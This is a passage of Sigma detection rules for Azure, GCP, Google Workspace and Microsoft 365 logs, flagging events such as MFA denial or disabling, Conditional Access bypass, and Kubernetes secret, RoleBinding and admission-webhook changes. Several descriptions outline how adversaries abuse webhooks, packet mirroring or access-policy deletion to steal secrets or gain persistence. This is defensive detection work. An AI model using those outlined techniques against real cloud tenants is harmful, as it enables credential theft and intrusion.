level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml ================================================ title: Applications That Are Using ROPC Authentication Flow id: 55695bc0-c8cf-461f-a379-2535f563c854 status: test description: | Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022-06-01 tags: - attack.t1078 - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.initial-access logsource: product: azure service: signinlogs detection: selection: properties.message: ROPC condition: selection falsepositives: - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml ================================================ title: Account Disabled or Blocked for Sign in Attempts id: 4afac85c-224a-4dd7-b1af-8da40e1c60bd status: test description: Detects when an account is disabled or blocked for sign in but tried to log in references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts author: Yochana Henderson, '@Yochana-H' date: 2022-06-17 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: ResultType: 50057 ResultDescription: Failure condition: 
selection falsepositives: - Account disabled or blocked in error - Automation account has been blocked or disabled level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml ================================================ title: Sign-in Failure Due to Conditional Access Requirements Not Met id: b4a6d707-9430-4f5f-af68-0337f52d5c42 status: test description: Define a baseline threshold for failed sign-ins due to Conditional Access failures references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts author: Yochana Henderson, '@Yochana-H' date: 2022-06-01 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1110 - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: ResultType: 53003 Resultdescription: Blocked by Conditional Access condition: selection falsepositives: - Service Account misconfigured - Misconfigured Systems - Vulnerability Scanners level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml ================================================ title: Use of Legacy Authentication Protocols id: 60f6535a-760f-42a9-be3f-c9a0a025906e status: test description: Alert on when legacy authentication has been used on an account references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts author: Yochana Henderson, '@Yochana-H' date: 2022-06-17 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1110 logsource: product: azure service: signinlogs detection: selection: ActivityDetails: Sign-ins ClientApp: - Other client - IMAP - POP3 - MAPI - SMTP - Exchange ActiveSync - Exchange Web Services 
Username: 'UPN' condition: selection falsepositives: - User has been put in an exception group so they can use legacy authentication level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml ================================================ title: Login to Disabled Account id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 status: test description: Detects failed attempts to sign in to disabled accounts. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: AlertIQ date: 2021-10-10 modified: 2022-12-25 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: ResultType: 50057 ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_mfa_denies.yml ================================================ title: Multifactor Authentication Denied id: e40f4962-b02b-4192-9bfe-245f7ece1f99 status: test description: The user has indicated they did not initiate the MFA prompt, which could indicate an attacker has the password for the account.
references: - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ author: AlertIQ date: 2022-03-24 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1110 - attack.t1621 logsource: product: azure service: signinlogs detection: selection: AuthenticationRequirement: 'multiFactorAuthentication' Status|contains: 'MFA Denied' condition: selection falsepositives: - Users actually log in but mis-click the Deny button on the MFA prompt. level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml ================================================ title: Multifactor Authentication Interrupted id: 5496ff55-42ec-4369-81cb-00f417029e25 status: test description: Identifies user logins with multifactor authentication failures, which might be an indication that an attacker has the password for the account but can't pass the MFA challenge.
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: AlertIQ date: 2021-10-10 modified: 2022-12-18 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1110 - attack.t1621 logsource: product: azure service: signinlogs detection: selection_50074: ResultType: 50074 ResultDescription|contains: 'Strong Auth required' selection_500121: ResultType: 500121 ResultDescription|contains: 'Authentication failed during strong authentication request' condition: 1 of selection_* falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml ================================================ title: Azure Unusual Authentication Interruption id: 8366030e-7216-476b-9927-271d79f13cf3 status: test description: Detects when there is an interruption in the authentication process.
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: Austin Songer @austinsonger date: 2021-11-26 modified: 2022-12-18 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: product: azure service: signinlogs detection: selection_50097: ResultType: 50097 ResultDescription: 'Device authentication is required' selection_50155: ResultType: 50155 ResultDescription: 'DeviceAuthenticationFailed' selection_50158: ResultType: 50158 ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' condition: 1 of selection_* falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml ================================================ title: User Access Blocked by Azure Conditional Access id: 9a60e676-26ac-44c3-814b-0c2a8b977adf status: test description: | Detects when access has been blocked by Conditional Access policies. The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: AlertIQ date: 2021-10-10 modified: 2022-12-25 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.credential-access - attack.initial-access - attack.t1110 - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: ResultType: 53003 condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml ================================================ title: Users Authenticating To Other Azure AD Tenants id: 5f521e4b-0105-4b72-845b-2198a54487b9 status: test description: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants. references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins author: MikeDuddington, '@dudders1' date: 2022-06-30 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: Status: 'Success' HomeTenantId: 'HomeTenantID' filter: ResourceTenantId|contains: 'HomeTenantID' condition: selection and not filter falsepositives: - If this was approved by System Administrator. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_access_policy_deleted.yml ================================================ title: GCP Access Policy Deleted id: 32438676-1dba-4ac7-bf69-b86cba995e05 status: test description: | Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource. 
references: - https://cloud.google.com/access-context-manager/docs/audit-logging - https://cloud.google.com/logging/docs/audit/understanding-audit-logs - https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog author: Bryan Lim date: 2024-01-12 tags: - attack.persistence - attack.privilege-escalation - attack.t1098 logsource: product: gcp service: gcp.audit detection: selection: data.protoPayload.authorizationInfo.permission: - 'accesscontextmanager.accessPolicies.delete' - 'accesscontextmanager.accessPolicies.accessLevels.delete' - 'accesscontextmanager.accessPolicies.accessZones.delete' - 'accesscontextmanager.accessPolicies.authorizedOrgsDescs.delete' data.protoPayload.authorizationInfo.granted: 'true' data.protoPayload.serviceName: 'accesscontextmanager.googleapis.com' condition: selection falsepositives: - Legitimate administrative activities level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml ================================================ title: GCP Break-glass Container Workload Deployed id: 76737c19-66ee-4c07-b65a-a03301d1573d status: test description: | Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls. 
references: - https://cloud.google.com/binary-authorization author: Bryan Lim date: 2024-01-12 tags: - attack.privilege-escalation - attack.defense-evasion - attack.t1548 logsource: product: gcp service: gcp.audit detection: selection: data.protoPayload.resource.type: 'k8s_cluster' data.protoPayload.logName: - 'cloudaudit.googleapis.com/activity' - 'cloudaudit.googleapis.com%2Factivity' data.protoPayload.methodName: 'io.k8s.core.v1.pods.create' keywords: - 'image-policy.k8s.io/break-glass' condition: selection and keywords falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_bucket_enumeration.yml ================================================ title: Google Cloud Storage Buckets Enumeration id: e2feb918-4e77-4608-9697-990a1aaf74c3 status: test description: Detects when storage bucket is enumerated in Google Cloud. references: - https://cloud.google.com/storage/docs/json_api/v1/buckets author: Austin Songer @austinsonger date: 2021-08-14 modified: 2022-10-09 tags: - attack.discovery logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - storage.buckets.list - storage.buckets.listChannels condition: selection falsepositives: - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml ================================================ title: Google Cloud Storage Buckets Modified or Deleted id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 status: test description: Detects when storage bucket is modified or deleted in Google Cloud. 
references: - https://cloud.google.com/storage/docs/json_api/v1/buckets author: Austin Songer @austinsonger date: 2021-08-14 modified: 2022-10-09 tags: - attack.impact logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - storage.buckets.delete - storage.buckets.insert - storage.buckets.update - storage.buckets.patch condition: selection falsepositives: - Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml ================================================ title: Google Cloud Re-identifies Sensitive Information id: 234f9f48-904b-4736-a34c-55d23919e4b7 status: test description: Identifies when sensitive information is re-identified in google Cloud. references: - https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify author: Austin Songer @austinsonger date: 2021-08-15 modified: 2022-10-09 tags: - attack.impact - attack.t1565 logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: projects.content.reidentify condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml ================================================ title: Google Cloud DNS Zone Modified or Deleted id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3 status: test description: Identifies when a DNS Zone is modified or deleted in Google Cloud. 
references: - https://cloud.google.com/dns/docs/reference/v1/managedZones author: Austin Songer @austinsonger date: 2021-08-15 modified: 2022-10-09 tags: - attack.impact logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - Dns.ManagedZones.Delete - Dns.ManagedZones.Update - Dns.ManagedZones.Patch condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml ================================================ title: Google Cloud Firewall Modified or Deleted id: fe513c69-734c-4d4a-8548-ac5f609be82b status: test description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). references: - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html author: Austin Songer @austinsonger date: 2021-08-13 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1562 logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - v*.Compute.Firewalls.Delete - v*.Compute.Firewalls.Patch - v*.Compute.Firewalls.Update - v*.Compute.Firewalls.Insert condition: selection falsepositives: - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected. - Exceptions can be added to this rule to filter expected behavior. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml ================================================ title: Google Full Network Traffic Packet Capture id: 980a7598-1e7f-4962-9372-2d754c930d0e status: test description: Identifies potential full network packet capture in gcp. 
This feature can potentially be abused to read sensitive data from unencrypted internal traffic. references: - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html author: Austin Songer @austinsonger date: 2021-08-13 modified: 2022-10-09 tags: - attack.collection - attack.t1074 logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - v*.Compute.PacketMirrorings.Get - v*.Compute.PacketMirrorings.Delete - v*.Compute.PacketMirrorings.Insert - v*.Compute.PacketMirrorings.Patch - v*.Compute.PacketMirrorings.List - v*.Compute.PacketMirrorings.aggregatedList condition: selection falsepositives: - Full Network Packet Capture may be done by a system or network administrator. - If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml ================================================ title: Google Cloud Kubernetes Admission Controller id: 6ad91e31-53df-4826-bd27-0166171c8040 status: test description: | Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. 
An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. references: - https://cloud.google.com/kubernetes-engine/docs author: Austin Songer @austinsonger date: 2021-11-25 modified: 2022-12-18 tags: - attack.privilege-escalation - attack.initial-access - attack.defense-evasion - attack.persistence - attack.t1078 - attack.credential-access - attack.t1552 - attack.t1552.007 logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name|startswith: 'admissionregistration.k8s.io.v' gcp.audit.method_name|contains: - '.mutatingwebhookconfigurations.' - '.validatingwebhookconfigurations.' gcp.audit.method_name|endswith: - 'create' - 'patch' - 'replace' condition: selection falsepositives: - Google Cloud Kubernetes Admission Controller changes may be made by a system administrator. - If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml ================================================ title: Google Cloud Kubernetes CronJob id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435 status: test description: | Identifies when a Google Cloud Kubernetes CronJob runs in Google Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster.
references: - https://cloud.google.com/kubernetes-engine/docs - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ - https://kubernetes.io/docs/concepts/workloads/controllers/job/ author: Austin Songer @austinsonger date: 2021-11-22 modified: 2022-12-25 tags: - attack.persistence - attack.privilege-escalation - attack.execution logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - io.k8s.api.batch.v*.Job - io.k8s.api.batch.v*.CronJob condition: selection falsepositives: - Google Cloud Kubernetes CronJob/Job creation may be done by a system administrator. - If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml ================================================ title: Google Cloud Kubernetes RoleBinding id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e status: test description: Detects the creation or patching of potentially malicious RoleBindings. This includes RoleBindings and ClusterRoleBindings.
references: - https://github.com/elastic/detection-rules/pull/1267 - https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole - https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control - https://kubernetes.io/docs/reference/access-authn-authz/rbac/ - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging author: Austin Songer @austinsonger date: 2021-08-09 modified: 2022-10-09 tags: - attack.credential-access logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - io.k8s.authorization.rbac.v*.clusterrolebindings.create - io.k8s.authorization.rbac.v*.rolebindings.create - io.k8s.authorization.rbac.v*.clusterrolebindings.patch - io.k8s.authorization.rbac.v*.rolebindings.patch - io.k8s.authorization.rbac.v*.clusterrolebindings.update - io.k8s.authorization.rbac.v*.rolebindings.update - io.k8s.authorization.rbac.v*.clusterrolebindings.delete - io.k8s.authorization.rbac.v*.rolebindings.delete condition: selection falsepositives: - RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml ================================================ title: Google Cloud Kubernetes Secrets Modified or Deleted id: 2f0bae2d-bf20-4465-be86-1311addebaa3 status: test description: Identifies when the Secrets are Modified or Deleted. 
references: - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging author: Austin Songer @austinsonger date: 2021-08-09 modified: 2022-10-09 tags: - attack.credential-access logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - io.k8s.core.v*.secrets.create - io.k8s.core.v*.secrets.update - io.k8s.core.v*.secrets.patch - io.k8s.core.v*.secrets.delete condition: selection falsepositives: - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml ================================================ title: Google Cloud Service Account Disabled or Deleted id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f status: test description: Identifies when a service account is disabled or deleted in Google Cloud. references: - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts author: Austin Songer @austinsonger date: 2021-08-14 modified: 2022-10-09 tags: - attack.impact - attack.t1531 logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name|endswith: - .serviceAccounts.disable - .serviceAccounts.delete condition: selection falsepositives: - Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_service_account_modified.yml ================================================ title: Google Cloud Service Account Modified id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc status: test description: Identifies when a service account is modified in Google Cloud. references: - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts author: Austin Songer @austinsonger date: 2021-08-14 modified: 2022-10-09 tags: - attack.impact logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name|endswith: - .serviceAccounts.patch - .serviceAccounts.create - .serviceAccounts.update - .serviceAccounts.enable - .serviceAccounts.undelete condition: selection falsepositives: - Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml ================================================ title: Google Cloud SQL Database Modified or Deleted id: f346bbd5-2c4e-4789-a221-72de7685090d status: test description: Detect when a Cloud SQL DB has been modified or deleted. references: - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update author: Austin Songer @austinsonger date: 2021-10-15 modified: 2022-12-25 tags: - attack.impact logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - cloudsql.instances.create - cloudsql.instances.delete - cloudsql.users.update - cloudsql.users.delete condition: selection falsepositives: - SQL Database being modified or deleted may be performed by a system administrator. 
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml ================================================ title: Google Cloud VPN Tunnel Modified or Deleted id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1 status: test description: Identifies when a VPN Tunnel is modified or deleted in Google Cloud. references: - https://any-api.com/googleapis_com/compute/docs/vpnTunnels author: Austin Songer @austinsonger date: 2021-08-16 modified: 2022-10-09 tags: - attack.impact logsource: product: gcp service: gcp.audit detection: selection: gcp.audit.method_name: - compute.vpnTunnels.insert - compute.vpnTunnels.delete condition: selection falsepositives: - VPN Tunnel being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml ================================================ title: Google Workspace Application Access Level Modified id: 22f2fb54-5312-435d-852f-7c74f81684ca status: test description: | Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing a Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources.
references: - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings - https://support.google.com/a/answer/9261439 author: Bryan Lim date: 2024-01-12 tags: - attack.persistence - attack.privilege-escalation - attack.t1098.003 logsource: product: gcp service: google_workspace.admin detection: selection: eventService: 'admin.googleapis.com' eventName: 'CHANGE_APPLICATION_SETTING' setting_name|startswith: 'ContextAwareAccess' condition: selection falsepositives: - Legitimate administrative activities changing the access levels for an application level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_application_removed.yml ================================================ title: Google Workspace Application Removed id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 status: test description: Detects when an application is removed from Google Workspace. references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST author: Austin Songer date: 2021-08-26 modified: 2023-10-11 tags: - attack.impact logsource: product: gcp service: google_workspace.admin detection: selection: eventService: admin.googleapis.com eventName: - REMOVE_APPLICATION - REMOVE_APPLICATION_FROM_WHITELIST condition: selection falsepositives: - Application removal may be performed by a System Administrator.
level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml ================================================ title: Google Workspace Granted Domain API Access id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba status: test description: Detects when an API access service account is granted domain authority. references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS author: Austin Songer date: 2021-08-23 modified: 2023-10-11 tags: - attack.privilege-escalation - attack.persistence - attack.t1098 logsource: product: gcp service: google_workspace.admin detection: selection: eventService: admin.googleapis.com eventName: AUTHORIZE_API_CLIENT_ACCESS condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml ================================================ title: Google Workspace MFA Disabled id: 780601d1-6376-4f2a-884e-b8d45599f78c status: test description: Detects when multi-factor authentication (MFA) is disabled. 
references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION author: Austin Songer date: 2021-08-26 modified: 2023-10-11 tags: - attack.impact logsource: product: gcp service: google_workspace.admin detection: selection_base: eventService: admin.googleapis.com eventName: - ENFORCE_STRONG_AUTHENTICATION - ALLOW_STRONG_AUTHENTICATION selection_eventValue: new_value: 'false' condition: all of selection* falsepositives: - MFA may be disabled legitimately by a system administrator. level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml ================================================ title: Google Workspace Role Modified or Deleted id: 6aef64e3-60c6-4782-8db3-8448759c714e status: test description: Detects when a role is modified or deleted in Google Workspace. references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings author: Austin Songer date: 2021-08-24 modified: 2023-10-11 tags: - attack.impact logsource: product: gcp service: google_workspace.admin detection: selection: eventService: admin.googleapis.com eventName: - DELETE_ROLE - RENAME_ROLE - UPDATE_ROLE condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml ================================================ title: Google Workspace Role Privilege Deleted id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 status: test description: Detects when a role privilege is deleted in Google Workspace.
references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings author: Austin Songer date: 2021-08-24 modified: 2023-10-11 tags: - attack.impact logsource: product: gcp service: google_workspace.admin detection: selection: eventService: admin.googleapis.com eventName: REMOVE_PRIVILEGE condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml ================================================ title: Google Workspace User Granted Admin Privileges id: 2d1b83e4-17c6-4896-a37b-29140b40a788 status: test description: Detects when a Google Workspace user is granted admin privileges. references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE author: Austin Songer date: 2021-08-23 modified: 2023-10-11 tags: - attack.privilege-escalation - attack.persistence - attack.t1098 logsource: product: gcp service: google_workspace.admin detection: selection: eventService: admin.googleapis.com eventName: - GRANT_DELEGATED_ADMIN_PRIVILEGES - GRANT_ADMIN_PRIVILEGE condition: selection falsepositives: - Google Workspace admin role privileges may be modified legitimately by system administrators. level: medium ================================================ FILE: rules/cloud/m365/audit/microsoft365_bypass_conditional_access.yml ================================================ title: Azure Login Bypassing Conditional Access Policies id: 13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc status: experimental description: | Detects a successful login to the Microsoft Intune Company Portal, which could allow bypassing Conditional Access Policies and Intune device trust using a tool like TokenSmith.
author: Josh Nickels, Marius Rothenbücher references: - https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/ - https://github.com/JumpsecLabs/TokenSmith date: 2025-01-08 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078 logsource: service: audit product: m365 detection: selection: Operation: 'UserLoggedIn' ApplicationId: '9ba1a5c7-f17a-4de9-a1f1-6178c8d51223' ResultStatus: 'Success' RequestType: 'Cmsi:Cmsi' filter_main_bjectid: ObjectId: '0000000a-0000-0000-c000-000000000000' # Microsoft Intune seen when mobile devices are enrolled condition: selection and not 1 of filter_main_* falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/m365/audit/microsoft365_disabling_mfa.yml ================================================ title: Disabling Multi Factor Authentication id: 60de9b57-dc4d-48b9-a6a0-b39e0469f876 status: test description: Detects disabling of Multi Factor Authentication. references: - https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/ author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule) date: 2023-09-18 tags: - attack.persistence - attack.defense-evasion - attack.credential-access - attack.t1556.006 logsource: service: audit product: m365 detection: selection: Operation|contains: 'Disable Strong Authentication.' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml ================================================ title: New Federated Domain Added id: 58f88172-a73d-442b-94c9-95eaed3cbb36 related: - id: 42127bdd-9133-474f-a6f1-97b6c08a4339 type: similar status: test description: Detects the addition of a new Federated Domain. 
